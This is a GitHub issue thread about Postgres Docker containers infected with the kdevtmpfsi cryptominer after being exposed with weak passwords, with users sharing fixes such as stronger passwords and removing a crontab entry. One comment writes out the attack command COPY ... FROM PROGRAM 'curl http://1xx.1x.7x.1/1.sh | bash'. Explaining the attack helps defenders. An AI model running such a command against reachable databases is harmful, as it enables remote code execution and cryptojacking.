Closed cottons-kr closed 1 year ago
This is an unfortunate consequence of having a public-facing instance with a compromised (or simple) password. https://github.com/docker-library/postgres/issues/817#issuecomment-781482631 https://github.com/docker-library/postgres/issues/798#issuecomment-747610025
See also: https://github.com/docker-library/redis/issues/217 https://github.com/docker-library/redis/issues/225 https://github.com/docker-library/php/issues/1110 https://github.com/docker-library/php/issues/1127
I wonder how is someone able to install mining malware if they only can access your database via psql console?
@zedefi :
I wonder how is someone able to install mining malware if they only can access your database via psql console?
Attack Sequence: open port + brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
Attack Sequence: open port + brute force attack +
COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
Well said @ImreSamu, Yes thats actually true, i faced the same issue because of exposing database ports to the internet,
i have the same issue because having a weak password. changing the password to a strong one, works for me.
One thing I found useful was to sudo -u postgres crontab -e
where I found the cronjob that kept restarting it. After deleting that it seems to have quietened down. Fingers crossed!
I noticed that
/tmp/kdevtmpfsi
is using all cpu resource. so I tried to remove it but it was in/var/lib/docker/overlay2/.../.../merged
. I stopped PostgreSQL container because it was the only running container in the server.